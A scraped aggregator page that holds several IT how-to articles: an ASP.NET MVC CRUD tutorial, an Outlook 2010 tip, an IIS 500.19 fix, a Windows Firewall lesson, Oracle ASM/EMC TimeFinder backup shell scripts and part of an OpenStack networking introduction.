the page looks like after the fix: Technorati Tags: ASP.NET MVC,ASP.NET MVC 5,Bootstrap

    Read the article

  • Mark Messages As Read in the Outlook 2010 Reading Pane

    - by Matthew Guay
    Do you ever feel annoyed that Outlook 2010 doesn’t mark messages as Read as soon as you click and view them in the Reading Pane?  Here we show you how to make Outlook mark them as read as soon as they’re opened. Mark as Read By default, Outlook will not mark a message as read until you select another message.  This can be annoying, because if you read a message and immediately click Delete, it will show up as an unread message in our Deleted Items folder. Let’s change this to make Outlook mark messages as read as soon as we view them in the Reading Pane.  Open Outlook and click File to open Backstage View, and select Options. In Options select Mail on the left menu, and under Outlook panes click on the Reading Pane button. Check the box Mark items as read when viewed in the Reading Pane to make Outlook mark your messages as read when you view them in the Reading Pane.  By default, Outlook will only mark a message read after you’ve been reading it for 5 seconds, though you can change this.  We set it to 0 seconds so our messages would be marked as read as soon as we select them. Click OK in both dialogs, and now your messages will be marked as read as soon as you select them in the reading pane, or soon after, depending on your settings. Conclusion Outlook 2010 is a great email client, but like most programs it has its quirks.  This quick tip can help you get rid of one of Outlook’s annoying features, and make it work like you want it to. And, if you’re still using Outlook 2007, check out our article on how to Mark Messages as Read When Viewed in Outlook 2007. Similar Articles Productive Geek Tips Make Outlook 2007 Mark Items as Read When Viewed in Reading PaneMake Mail.app’s Reading Pane More Like OutlookIntegrate Twitter With Microsoft OutlookSort Your Emails by Conversation in Outlook 2010Find Emails With Attachments with Outlook 2007’s Instant Search TouchFreeze Alternative in AutoHotkey The Icy Undertow Desktop Windows Home Server – Backup to LAN The Clear & Clean Desktop Use This Bookmarklet to Easily Get Albums Use AutoHotkey to Assign a Hotkey to a Specific Window Latest Software Reviews Tinyhacker Random Tips All My Movies 5.9 CloudBerry Online Backup 1.5 for Windows Home Server Snagit 10 VMware Workstation 7 OpenDNS Guide Google TV The iPod Revolution Ultimate Boot CD can help when disaster strikes Windows Firewall with Advanced Security – How To Guides Sculptris 1.0, 3D Drawing app

    Read the article

  • Resolving IIS7 HTTP Error 500.19 - Internal Server Error

    - by fatherjack
    LiveJournal Tags: RedGate Tools,SQL Server,Tips and Tricks How To The requested page cannot be accessed because the related configuration data for the page is invalid. As part of my work recently I was moving SQL Monitor from the bespoke XSP web server to be hosted on IIS instead. This didn't go smoothly. I was lucky to be helped by Red Gate's support team (http://twitter.com/kickasssupport). I had SQL Monitor installed and working fine on the XSP site but wanted to move to IIS so I reinstalled the software and chose the IIS option. This wasn't possible as IIS wasn't installed on the server. I went to Control Panel, Windows features and installed IIS and then returned to the SQL Monitor installer. Everything went as planned but when I browsed the site I got a huge error with the message "HTTP Error 500.19 - Internal Server Error The requested page cannot be accessed because the related configuration data for the page is invalid." All links that I could find suggested it was a permissions issue, based on the directory where the config file was stored. I changed this any number of times and also tried the altering its location. Nothing resolved the error. It was only when I was trying the installation again that I read through the details from Red Gate and noted that they referred to ASP settings that I didn't have. Essentially I was seeing this. I had installed IIS using the default settings and that DOESN'T include ASP. When this dawned on me I went back through the windows components installation process and ticked the ASP service within the IIS role. Completing this and going back to the IIS management console I saw something like this; so many more options! When I clicked on the Authentication icon this time I got the option to not only enable Anonymous Authentication but also ASP.NET Impersonation (which is disabled by default). Once I had enabled this the SQL Monitor website worked without error. I think the HTTP Error 500.19 is misleading in this case and at the very least should be able to recognise if the ASP service is installed or not and then to include a hint that it should be. I hope this helps some people and avoids wasting as much of your time as it did mine. Let me know if it helps you.

    Read the article

  • Yet Another ASP.NET MVC CRUD Tutorial

    - by Ricardo Peres
    I know that I have not posted much on MVC, mostly because I don’t use it on my daily life, but since I find it so interesting, and since it is gaining such popularity, I will be talking about it much more. This time, it’s about the most basic of scenarios: CRUD. Although there are several ASP.NET MVC tutorials out there that cover ordinary CRUD operations, I couldn’t find any that would explain how we can have also AJAX, optimistic concurrency control and validation, using Entity Framework Code First, so I set out to write one! I won’t go into explaining what is MVC, Code First or optimistic concurrency control, or AJAX, I assume you are all familiar with these concepts by now. Let’s consider an hypothetical use case, products. For simplicity, we only want to be able to either view a single product or edit this product. First, we need our model: 1: public class Product 2: { 3: public Product() 4: { 5: this.Details = new HashSet<OrderDetail>(); 6: } 7:  8: [Required] 9: [StringLength(50)] 10: public String Name 11: { 12: get; 13: set; 14: } 15:  16: [Key] 17: [ScaffoldColumn(false)] 18: [DatabaseGenerated(DatabaseGeneratedOption.Identity)] 19: public Int32 ProductId 20: { 21: get; 22: set; 23: } 24:  25: [Required] 26: [Range(1, 100)] 27: public Decimal Price 28: { 29: get; 30: set; 31: } 32:  33: public virtual ISet<OrderDetail> Details 34: { 35: get; 36: protected set; 37: } 38:  39: [Timestamp] 40: [ScaffoldColumn(false)] 41: public Byte[] RowVersion 42: { 43: get; 44: set; 45: } 46: } Keep in mind that this is a simple scenario. Let’s see what we have: A class Product, that maps to a product record on the database; A product has a required (RequiredAttribute) Name property which can contain up to 50 characters (StringLengthAttribute); The product’s Price must be a decimal value between 1 and 100 (RangeAttribute); It contains a set of order details, for each time that it has been ordered, which we will not talk about (Details); The record’s primary key (mapped to property ProductId) comes from a SQL Server IDENTITY column generated by the database (KeyAttribute, DatabaseGeneratedAttribute); The table uses a SQL Server ROWVERSION (previously known as TIMESTAMP) column for optimistic concurrency control mapped to property RowVersion (TimestampAttribute). Then we will need a controller for viewing product details, which will located on folder ~/Controllers under the name ProductController: 1: public class ProductController : Controller 2: { 3: [HttpGet] 4: public ViewResult Get(Int32 id = 0) 5: { 6: if (id != 0) 7: { 8: using (ProductContext ctx = new ProductContext()) 9: { 10: return (this.View("Single", ctx.Products.Find(id) ?? new Product())); 11: } 12: } 13: else 14: { 15: return (this.View("Single", new Product())); 16: } 17: } 18: } If the requested product does not exist, or one was not requested at all, one with default values will be returned. I am using a view named Single to display the product’s details, more on that later. As you can see, it delegates the loading of products to an Entity Framework context, which is defined as: 1: public class ProductContext: DbContext 2: { 3: public DbSet<Product> Products 4: { 5: get; 6: set; 7: } 8: } Like I said before, I’ll keep it simple for now, only aggregate root Product is available. The controller will use the standard routes defined by the Visual Studio ASP.NET MVC 3 template: 1: routes.MapRoute( 2: "Default", // Route name 3: "{controller}/{action}/{id}", // URL with parameters 4: new { controller = "Home", action = "Index", id = UrlParameter.Optional } // Parameter defaults 5: ); Next, we need a view for displaying the product details, let’s call it Single, and have it located under ~/Views/Product: 1: <%@ Page Language="C#" Inherits="System.Web.Mvc.ViewPage<Product>" %> 2: <!DOCTYPE html> 3:  4: <html> 5: <head runat="server"> 6: <title>Product</title> 7: <script src="/Scripts/jquery-1.7.2.js" type="text/javascript"></script> 1:  2: <script src="/Scripts/jquery-ui-1.8.19.js" type="text/javascript"> 1: </script> 2: <script src="/Scripts/jquery.unobtrusive-ajax.js" type="text/javascript"> 1: </script> 2: <script src="/Scripts/jquery.validate.js" type="text/javascript"> 1: </script> 2: <script src="/Scripts/jquery.validate.unobtrusive.js" type="text/javascript"> 1: </script> 2: <script type="text/javascript"> 3: function onFailure(error) 4: { 5: } 6:  7: function onComplete(ctx) 8: { 9: } 10:  11: </script> 8: </head> 9: <body> 10: <div> 11: <% 1: : this.Html.ValidationSummary(false) %> 12: <% 1: using (this.Ajax.BeginForm("Edit", "Product", new AjaxOptions{ HttpMethod = FormMethod.Post.ToString(), OnSuccess = "onSuccess", OnFailure = "onFailure" })) { %> 13: <% 1: : this.Html.EditorForModel() %> 14: <input type="submit" name="submit" value="Submit" /> 15: <% 1: } %> 16: </div> 17: </body> 18: </html> Yes… I am using ASPX syntax… sorry about that!   I implemented an editor template for the Product class, which must be located on the ~/Views/Shared/EditorTemplates folder as file Product.ascx: 1: <%@ Control Language="C#" Inherits="System.Web.Mvc.ViewUserControl<Product>" %> 2: <div> 3: <%: this.Html.HiddenFor(model => model.ProductId) %> 4: <%: this.Html.HiddenFor(model => model.RowVersion) %> 5: <fieldset> 6: <legend>Product</legend> 7: <div class="editor-label"> 8: <%: this.Html.LabelFor(model => model.Name) %> 9: </div> 10: <div class="editor-field"> 11: <%: this.Html.TextBoxFor(model => model.Name) %> 12: <%: this.Html.ValidationMessageFor(model => model.Name) %> 13: </div> 14: <div class="editor-label"> 15: <%= this.Html.LabelFor(model => model.Price) %> 16: </div> 17: <div class="editor-field"> 18: <%= this.Html.TextBoxFor(model => model.Price) %> 19: <%: this.Html.ValidationMessageFor(model => model.Price) %> 20: </div> 21: </fieldset> 22: </div> One thing you’ll notice is, I am including both the ProductId and the RowVersion properties as hidden fields; they will come handy later or, so that we know what product and version we are editing. The other thing is the included JavaScript files: jQuery, jQuery UI and unobtrusive validations. Also, I am not using the Content extension method for translating relative URLs, because that way I would lose JavaScript intellisense for jQuery functions. OK, so, at this moment, I want to add support for AJAX and optimistic concurrency control. So I write a controller method like this: 1: [HttpPost] 2: [AjaxOnly] 3: [Authorize] 4: public JsonResult Edit(Product product) 5: { 6: if (this.TryValidateModel(product) == true) 7: { 8: using (BlogContext ctx = new BlogContext()) 9: { 10: Boolean success = false; 11:  12: ctx.Entry(product).State = (product.ProductId == 0) ? EntityState.Added : EntityState.Modified; 13:  14: try 15: { 16: success = (ctx.SaveChanges() == 1); 17: } 18: catch (DbUpdateConcurrencyException) 19: { 20: ctx.Entry(product).Reload(); 21: } 22:  23: return (this.Json(new { Success = success, ProductId = product.ProductId, RowVersion = Convert.ToBase64String(product.RowVersion) })); 24: } 25: } 26: else 27: { 28: return (this.Json(new { Success = false, ProductId = 0, RowVersion = String.Empty })); 29: } 30: } So, this method is only valid for HTTP POST requests (HttpPost), coming from AJAX (AjaxOnly, from MVC Futures), and from authenticated users (Authorize). It returns a JSON object, which is what you would normally use for AJAX requests, containing three properties: Success: a boolean flag; RowVersion: the current version of the ROWVERSION column as a Base-64 string; ProductId: the inserted product id, as coming from the database. If the product is new, it will be inserted into the database, and its primary key will be returned into the ProductId property. Success will be set to true; If a DbUpdateConcurrencyException occurs, it means that the value in the RowVersion property does not match the current ROWVERSION column value on the database, so the record must have been modified between the time that the page was loaded and the time we attempted to save the product. In this case, the controller just gets the new value from the database and returns it in the JSON object; Success will be false. Otherwise, it will be updated, and Success, ProductId and RowVersion will all have their values set accordingly. So let’s see how we can react to these situations on the client side. Specifically, we want to deal with these situations: The user is not logged in when the update/create request is made, perhaps the cookie expired; The optimistic concurrency check failed; All went well. So, let’s change our view: 1: <%@ Page Language="C#" Inherits="System.Web.Mvc.ViewPage<Product>" %> 2: <%@ Import Namespace="System.Web.Security" %> 3:  4: <!DOCTYPE html> 5:  6: <html> 7: <head runat="server"> 8: <title>Product</title> 9: <script src="/Scripts/jquery-1.7.2.js" type="text/javascript"></script> 1:  2: <script src="/Scripts/jquery-ui-1.8.19.js" type="text/javascript"> 1: </script> 2: <script src="/Scripts/jquery.unobtrusive-ajax.js" type="text/javascript"> 1: </script> 2: <script src="/Scripts/jquery.validate.js" type="text/javascript"> 1: </script> 2: <script src="/Scripts/jquery.validate.unobtrusive.js" type="text/javascript"> 1: </script> 2: <script type="text/javascript"> 3: function onFailure(error) 4: { 5: window.alert('An error occurred: ' + error); 6: } 7:  8: function onSuccess(ctx) 9: { 10: if (typeof (ctx.Success) != 'undefined') 11: { 12: $('input#ProductId').val(ctx.ProductId); 13: $('input#RowVersion').val(ctx.RowVersion); 14:  15: if (ctx.Success == false) 16: { 17: window.alert('An error occurred while updating the entity: it may have been modified by third parties. Please try again.'); 18: } 19: else 20: { 21: window.alert('Saved successfully'); 22: } 23: } 24: else 25: { 26: if (window.confirm('Not logged in. Login now?') == true) 27: { 28: document.location.href = '<%: FormsAuthentication.LoginUrl %>?ReturnURL=' + document.location.pathname; 29: } 30: } 31: } 32:  33: </script> 10: </head> 11: <body> 12: <div> 13: <% 1: : this.Html.ValidationSummary(false) %> 14: <% 1: using (this.Ajax.BeginForm("Edit", "Product", new AjaxOptions{ HttpMethod = FormMethod.Post.ToString(), OnSuccess = "onSuccess", OnFailure = "onFailure" })) { %> 15: <% 1: : this.Html.EditorForModel() %> 16: <input type="submit" name="submit" value="Submit" /> 17: <% 1: } %> 18: </div> 19: </body> 20: </html> The implementation of the onSuccess function first checks if the response contains a Success property, if not, the most likely cause is the request was redirected to the login page (using Forms Authentication), because it wasn’t authenticated, so we navigate there as well, keeping the reference to the current page. It then saves the current values of the ProductId and RowVersion properties to their respective hidden fields. They will be sent on each successive post and will be used in determining if the request is for adding a new product or to updating an existing one. The only thing missing is the ability to insert a new product, after inserting/editing an existing one, which can be easily achieved using this snippet: 1: <input type="button" value="New" onclick="$('input#ProductId').val('');$('input#RowVersion').val('');"/> And that’s it.

    Read the article

  • [GEEK SCHOOL] Network Security 4: Windows Firewall: Your System’s Best Defense

    - by Ciprian Rusen
    If you have your computer connected to a network, or directly to your Internet connection, then having a firewall is an absolute necessity. In this lesson we will discuss the Windows Firewall – one of the best security features available in Windows! The Windows Firewall made its debut in Windows XP. Prior to that, Windows system needed to rely on third-party solutions or dedicated hardware to protect them from network-based attacks. Over the years, Microsoft has done a great job with it and it is one of the best firewalls you will ever find for Windows operating systems. Seriously, it is so good that some commercial vendors have decided to piggyback on it! Let’s talk about what you will learn in this lesson. First, you will learn about what the Windows Firewall is, what it does, and how it works. Afterward, you will start to get your hands dirty and edit the list of apps, programs, and features that are allowed to communicate through the Windows Firewall depending on the type of network you are connected to. Moving on from there, you will learn how to add new apps or programs to the list of allowed items and how to remove the apps and programs that you want to block. Last but not least, you will learn how to enable or disable the Windows Firewall, for only one type of networks or for all network connections. By the end of this lesson, you should know enough about the Windows Firewall to use and manage it effectively. What is the Windows Firewall? Windows Firewall is an important security application that’s built into Windows. One of its roles is to block unauthorized access to your computer. The second role is to permit authorized data communications to and from your computer. Windows Firewall does these things with the help of rules and exceptions that are applied both to inbound and outbound traffic. They are applied depending on the type of network you are connected to and the location you have set for it in Windows, when connecting to the network. Based on your choice, the Windows Firewall automatically adjusts the rules and exceptions applied to that network. This makes the Windows Firewall a product that’s silent and easy to use. It bothers you only when it doesn’t have any rules and exceptions for what you are trying to do or what the programs running on your computer are trying to do. If you need a refresher on the concept of network locations, we recommend you to read our How-To Geek School class on Windows Networking. Another benefit of the Windows Firewall is that it is so tightly and nicely integrated into Windows and all its networking features, that some commercial vendors decided to piggyback onto it and use it in their security products. For example, products from companies like Trend Micro or F-Secure no longer provide their proprietary firewall modules but use the Windows Firewall instead. Except for a few wording differences, the Windows Firewall works the same in Windows 7 and Windows 8.x. The only notable difference is that in Windows 8.x you will see the word “app” being used instead of “program”. Where to Find the Windows Firewall By default, the Windows Firewall is turned on and you don’t need to do anything special in order for it work. You will see it displaying some prompts once in a while but they show up so rarely that you might forget that is even working. If you want to access it and configure the way it works, go to the Control Panel, then go to “System and Security” and select “Windows Firewall”. Now you will see the Windows Firewall window where you can get a quick glimpse on whether it is turned on and the type of network you are connected to: private networks or public network. For the network type that you are connected to, you will see additional information like: The state of the Windows Firewall How the Windows Firewall deals with incoming connections The active network When the Windows Firewall will notify you You can easily expand the other section and view the default settings that apply when connecting to networks of that type. If you have installed a third-party security application that also includes a firewall module, chances are that the Windows Firewall has been disabled, in order to avoid performance issues and conflicts between the two security products. If that is the case for your computer or device, you won’t be able to view any information in the Windows Firewall window and you won’t be able to configure the way it works. Instead, you will see a warning that says: “These settings are being managed by vendor application – Application Name”. In the screenshot below you can see an example of how this looks. How to Allow Desktop Applications Through the Windows Firewall Windows Firewall has a very comprehensive set of rules and most Windows programs that you install add their own exceptions to the Windows Firewall so that they receive network and Internet access. This means that you will see prompts from the Windows Firewall on occasion, generally when you install programs that do not add their own exceptions to the Windows Firewall’s list. In a Windows Firewall prompt, you are asked to select the network locations to which you allow access for that program: private networks or public networks. By default, Windows Firewall selects the checkbox that’s appropriate for the network you are currently using. You can decide to allow access for both types of network locations or just to one of them. To apply your setting press “Allow access”. If you want to block network access for that program, press “Cancel” and the program will be set as blocked for both network locations. At this step you should note that only administrators can set exceptions in the Windows Firewall. If you are using a standard account without administrator permissions, the programs that do not comply with the Windows Firewall rules and exceptions are automatically blocked, without any prompts being shown. You should note that in Windows 8.x you will never see any Windows Firewall prompts related to apps from the Windows Store. They are automatically given access to the network and the Internet based on the assumption that you are aware of the permissions they require based on the information displayed by the Windows Store. Windows Firewall rules and exceptions are automatically created for each app that you install from the Windows Store. However, you can easily block access to the network and the Internet for any app, using the instructions in the next section. How to Customize the Rules for Allowed Apps Windows Firewall allows any user with an administrator account to change the list of rules and exceptions applied for apps and desktop programs. In order to do this, first start the Windows Firewall. On the column on the left, click or tap “Allow an app or feature through Windows Firewall” (in Windows 8.x) or “Allow a program or feature through Windows Firewall” (in Windows 7). Now you see the list of apps and programs that are allowed to communicate through the Windows Firewall. At this point, the list is grayed out and you can only view which apps, features, and programs have rules that are enabled in the Windows Firewall.

    Read the article

  • On automating a split-mirror ASM backup with EMC TimeFinder ...

    - by [email protected]
    Normal 0 21 false false false MicrosoftInternetExplorer4 st1\:*{behavior:url(#ieooui) } /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ansi-language:#0400; mso-fareast-language:#0400; mso-bidi-language:#0400;} Hi clerks,   Offloading the backup operation to another host using disk cloning could really improve the performance on highly busy databases ( 24x7, zero downtime and all this stuff ...) There are well know white papers on this subject, ASM included, but today Im showing you a nice way to automate the procedure using shell scripting with EMC TimeFinder technologies:   Assumptions: *********** ASM diskgroups name:   +data_${db_name} : asm data diskgroup +fra_${db_name} :  asm fra  diskgroup   EMC Time Finder sync groups name:   rac_${DB_NAME}_data_tf : data group rac_${DB_NAME}_fra_tf:   fra group     There are two scripts, one located on the production box ( bck_database.sh ) and the other one on the backup server node ( bck_database_mirror.sh ) The second one is remotly executed from the production host There are a bunch of variables along the code with selfexplanatory names I guess, anyway let me know if you want some help     #!/bin/ksh ### ###  Copyright (c) 1988, 2010, Oracle Corporation.  All Rights Reserved. ### ###    NAME ###     bck_database.sh ### ###    DESCRIPTION ###     Database backup on third mirror ### ###    RETURNS ### ###    NOTES ### ###    MODIFIED                                 (DD/MM/YY) ###    Oracle            28/01/10             - Creacion ###   V_DATE=`/bin/date +%Y%m%d_%H%M%S` V_FICH_LOG=`dirname $0`/trace_dir_location/`basename $0`.${V_DATE}.log exec 4>&1 tee ${V_FICH_LOG} >&4 |& exec 1>&p 2>&1     ADMIN_DIR=`dirname $0` . ${ADMIN_DIR}/setenv_instance.sh -- This script should set the instance vars like Oracle Home, Sid, db_name ... if [ $? -ne 0 ] then   echo "Error when setting the environment."   exit 1 fi   echo "${V_DATE} ####################################################" echo "Executing database backup: ${DB_NAME}" echo "####################################################################"   V_DATE=`/bin/date +%Y%m%d_%H%M%S` echo "${V_DATE} ####################################################" echo "Sync asm data diskgroups ..." echo "####################################################################" sudo symmir -g rac_${DB_NAME}_data_tf establish -noprompt if [ $? -ne 0 ] then   echo "Error when sync asm data diskgroups"   exit 2 fi V_DATE=`/bin/date +%Y%m%d_%H%M%S` echo "${V_DATE} ####################################################" echo "Verifying asm data disks ..." echo "####################################################################" sudo symmir -g rac_${DB_NAME}_data_tf -i 30 verify if [ $? -ne 0 ] then   echo "Error when verifying asm data diskgroups"   exit 3 fi     V_DATE=`/bin/date +%Y%m%d_%H%M%S` echo "${V_DATE} ####################################################" echo "Sync asm fra diskgroups ..." echo "####################################################################" sudo symmir -g rac_${DB_NAME}_fra_tf establish -noprompt if [ $? -ne 0 ] then   echo "Error when sync asm fra diskgroups"   exit 4 fi V_DATE=`/bin/date +%Y%m%d_%H%M%S` echo "${V_DATE} ####################################################" echo "Verifying asm fra disks ..." echo "####################################################################" sudo symmir -g rac_${DB_NAME}_fra_tf -i 30 verify if [ $? -ne 0 ] then   echo "Error when verifying asm fra diskgroups"   exit 5 fi   V_DATE=`/bin/date +%Y%m%d_%H%M%S` echo "${V_DATE} ####################################################" echo "ASM sync sucessfully completed!" echo "####################################################################"     V_DATE=`/bin/date +%Y%m%d_%H%M%S` echo "${V_DATE} ####################################################" echo "Updating status ${DB_NAME} to BEGIN BACKUP ..." echo "####################################################################" sqlplus -s /nolog <<-!   whenever sqlerror exit 1   connect / as sysdba   whenever sqlerror exit   alter system archive log current;   alter database ${DB_NAME} begin backup; ! if [ $? -ne 0 ] then   echo "Error when updating database status to BEGIN backup"   exit 6 fi   V_DATE=`/bin/date +%Y%m%d_%H%M%S` echo "${V_DATE} ####################################################" echo "Splitting asm data disks....." echo "####################################################################" sudo symmir -g rac_${DB_NAME}_data_tf split -noprompt if [ $? -ne 0 ] then   echo "Error when splitting asm data disks"   exit 7 fi   V_DATE=`/bin/date +%Y%m%d_%H%M%S` echo "${V_DATE} ####################################################" echo "Updating status ${DB_NAME} to END BACKUP ..." echo "####################################################################" sqlplus -s /nolog <<-!   whenever sqlerror exit 1   connect / as sysdba   whenever sqlerror exit   alter database ${DB_NAME} end backup;   alter system archive log current; ! if [ $? -ne 0 ] then   echo "Error when updating database status to END backup"   exit 8 fi   V_DATE=`/bin/date +%Y%m%d_%H%M%S` echo "${V_DATE} ####################################################" echo "Generating controlfile copies...." echo "####################################################################" rman<<-! connect target / run { allocate channel ch1 type DISK; copy current controlfile to '+FRA_${DB_NAME}/${DB_NAME}/CONTROLFILE/control_mount.ctl'; copy current controlfile to '+FRA_${DB_NAME}/${DB_NAME}/CONTROLFILE/control_backup.ctl'; } ! if [ $? -ne 0 ] then   echo "Error generating controlfile copies"   exit 9 fi V_DATE=`/bin/date +%Y%m%d_%H%M%S` echo "${V_DATE} ####################################################" echo "Resync RMAN catalog ....." echo "####################################################################" rman<<-! connect target / connect catalog ${V_RMAN_USR}/${V_RMAN_PWD}@${V_DB_CATALOG} resync catalog; ! if [ $? -ne 0 ] then   echo "Error when resyncing RMAN catalog"   exit 10 fi   V_DATE=`/bin/date +%Y%m%d_%H%M%S` echo "${V_DATE} ####################################################" echo "Splitting asm fra disks....." echo "####################################################################" sudo symmir -g rac_${DB_NAME}_fra_tf split -noprompt if [ $? -ne 0 ] then   echo "Error when splitting asm fra disks"   exit 11 fi     echo "WARNING!: Calling bck_database_mirror.sh host ${NODE_BCK_SERVER}..." ssh ${NODO_BCK_SERVER} ${ADMIN_DIR_BCK}/bck_database_mirror.sh if [ $? -ne 0 ] then   echo "Error, when remote executing the backup "   exit 12 fi V_DATE=`/bin/date +%Y%m%d_%H%M%S` echo "${V_DATE} ####################################################" echo "Cleaning the archived redo logs already copied to tape ..." echo "####################################################################" rman<<-! connect target / connect catalog ${V_RMAN_USR}/${V_RMAN_PWD}@${V_DB_CATALOG} run { resync catalog; delete noprompt archivelog all backed up 1 times to device type sbt; } ! if [ $? -ne 0 ] then   echo "Error when cleaning the archived redo logs"   exit 13 fi echo "${V_DATE} ####################################################" echo "Backup sucessfully executed!!" echo "####################################################################" exit 0   ------------------------------------------------------------------------------ ------------------------** BACKUP SERVER NODE ** ----------------------------- ------------------------------------------------------------------------------   #!/bin/ksh ### ###  Copyright (c) 1988, 2010, Oracle Corporation.  All Rights Reserved. ### ###    ###    NAME ###     bck_database_mirror.sh ### ###    DESCRIPTION ###      Backup @ backup server ### ###    RETURNS ### ###    NOTES ### ###    MODIFIED                                 (DD/MM/YY) ###      Oracle                    28/01/10     - Creacion         V_DATE=`/bin/date +%Y%m%d_%H%M%S`   echo "${V_DATE} ####################################################"   echo "Starting ASM instance ..."   echo "####################################################################"   ${V_ADMIN_DIR}/start_asm.sh -- This script is supposed to start the ASM instance in the backup server   if [ $? -ne 0 ]   then     echo "Error when tying to start ASM instance."     exit 1   fi       . ${V_ADMIN_DIR}/setenv_asm.sh -- This script is supposed to set the env. variables of the ASM instance   if [ $? -ne 0 ]   then     echo "Error when setting the ASM environment"     exit 1   fi       V_DATE=`/bin/date +%Y%m%d_%H%M%S`   echo "${V_DATE} ####################################################"   echo "The asm diskgroups/disks dettected are the following ..."   echo "####################################################################"     sqlplus /nolog <<-!     whenever sqlerror exit 1     connect / as sysdba     whenever sqlerror exit     SET LINES 200     COL PATH FORMAT A25     SELECT DISK.MOUNT_STATUS, DISK.PATH, DISK.NAME, DISK_GROUP.NAME, DISK_GROUP.TOTAL_MB FROM V\$ASM_DISK DISK, V\$ASM_DISKGROUP DISK_GROUP WHERE DISK.GROUP_NUMBER=DISK_GROUP.GROUP_NUMBER; !       V_ADMIN_DIR=`dirname $0`   . ${V_ADMIN_DIR}/setenv_instance.sh -- This script is supposed to set the env. variables of the database instance   if [ $? -ne 0 ]   then     echo "Error when setting the database instance environment"     exit 1   fi     V_DATE=`/bin/date +%Y%m%d_%H%M%S`   echo "${V_DATE} ####################################################"   echo "Starting ${DB_NAME} in MOUNT mode..."   echo "####################################################################"   ${V_ADMIN_DIR}/start_instance_mount.sh -- This script is supposed to do a startup mount   if [ $? -ne 0 ]   then     echo "Error starting  ${DB_NAME} in MOUNT mode"     exit 1   fi   V_DATE=`/bin/date +%Y%m%d_%H%M%S`   echo "${V_DATE} ####################################################"   echo "Executing RMAN backup..."   echo "####################################################################"   rman<<-!   connect target /   connect catalog ${V_RMAN_USR}/${V_RMAN_PWD}@${V_DB_CATALOG}   run {   allocate channel ch1 type 'SBT_TAPE' parms'ENV=(TDPO_OPTFILE=/opt/tivoli/tsm/client/oracle/bin64/tdpo.opt)'; -- TDPO Media Library   crosscheck archivelog all;   backup tag BCK_CONTROLFILE_ST_${DB_NAME}   format 'ctl_%d_%s__%p_%t'   controlfilecopy '+FRA_${DB_NAME}/${DB_NAME}/CONTROLFILE/control_backup.ctl';   backup tag BCK_DATAFILE_ST_${DB_NAME} full   format 'db_%d_%s_%p_%t'database;   backup tag BCK_ARCHLOG_ST_${DB_NAME} format 'al_%d_%s_%p_%t' archivelog all;   release channel ch1;   } !   if [ $? -ne 0 ]   then     echo "Error executing the RMAN backup"     exit 1   fi     ${V_ADMIN_DIR}/stop_instance_immediate.sh -- This script is supposed to do a shutdown immediate of the database instance   ${ADMIN_DIR}/stop_asm_immediate.sh -- This script is supposed to do a shutdown immediate of the ASM instance   exit 0     fi   Hope it helps someone! --L

    Read the article

  • Diving into OpenStack Network Architecture - Part 1

    - by Ronen Kofman
    v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} rkofman Normal rkofman 83 3045 2014-05-23T21:11:00Z 2014-05-27T06:58:00Z 3 1883 10739 Oracle Corporation 89 25 12597 12.00 140 Clean Clean false false false false EN-US X-NONE HE MicrosoftInternetExplorer4 /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0in; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:Arial; mso-bidi-theme-font:minor-bidi; mso-bidi-language:AR-SA;} Before we begin OpenStack networking has very powerful capabilities but at the same time it is quite complicated. In this blog series we will review an existing OpenStack setup using the Oracle OpenStack Tech Preview and explain the different network components through use cases and examples. The goal is to show how the different pieces come together and provide a bigger picture view of the network architecture in OpenStack. This can be very helpful to users making their first steps in OpenStack or anyone wishes to understand how networking works in this environment.  We will go through the basics first and build the examples as we go. According to the recent Icehouse user survey and the one before it, Neutron with Open vSwitch plug-in is the most widely used network setup both in production and in POCs (in terms of number of customers) and so in this blog series we will analyze this specific OpenStack networking setup. As we know there are many options to setup OpenStack networking and while Neturon + Open vSwitch is the most popular setup there is no claim that it is either best or the most efficient option. Neutron + Open vSwitch is an example, one which provides a good starting point for anyone interested in understanding OpenStack networking. Even if you are using different kind of network setup such as different Neutron plug-in or even not using Neutron at all this will still be a good starting point to understand the network architecture in OpenStack. The setup we are using for the examples is the one used in the Oracle OpenStack Tech Preview. Installing it is simple and it would be helpful to have it as reference. In this setup we use eth2 on all servers for VM network, all VM traffic will be flowing through this interface.The Oracle OpenStack Tech Preview is using VLANs for L2 isolation to provide tenant and network isolation. The following diagram shows how we have configured our deployment: This first post is a bit long and will focus on some basic concepts in OpenStack networking. The components we will be discussing are Open vSwitch, network namespaces, Linux bridge and veth pairs. Note that this is not meant to be a comprehensive review of these components, it is meant to describe the component as much as needed to understand OpenStack network architecture. All the components described here can be further explored using other resources. Open vSwitch (OVS) In the Oracle OpenStack Tech Preview OVS is used to connect virtual machines to the physical port (in our case eth2) as shown in the deployment diagram. OVS contains bridges and ports, the OVS bridges are different from the Linux bridge (controlled by the brctl command) which are also used in this setup. To get started let’s view the OVS structure, use the following command: # ovs-vsctl show 7ec51567-ab42-49e8-906d-b854309c9edf     Bridge br-int         Port br-int             Interface br-int type: internal         Port "int-br-eth2"             Interface "int-br-eth2"     Bridge "br-eth2"         Port "br-eth2"             Interface "br-eth2" type: internal         Port "eth2"             Interface "eth2"         Port "phy-br-eth2"             Interface "phy-br-eth2" ovs_version: "1.11.0" We see a standard post deployment OVS on a compute node with two bridges and several ports hanging off of each of them. The example above is a compute node without any VMs, we can see that the physical port eth2 is connected to a bridge called “br-eth2”. We also see two ports "int-br-eth2" and "phy-br-eth2" which are actually a veth pair and form virtual wire between the two bridges, veth pairs are discussed later in this post. When a virtual machine is created a port is created on one the br-int bridge and this port is eventually connected to the virtual machine 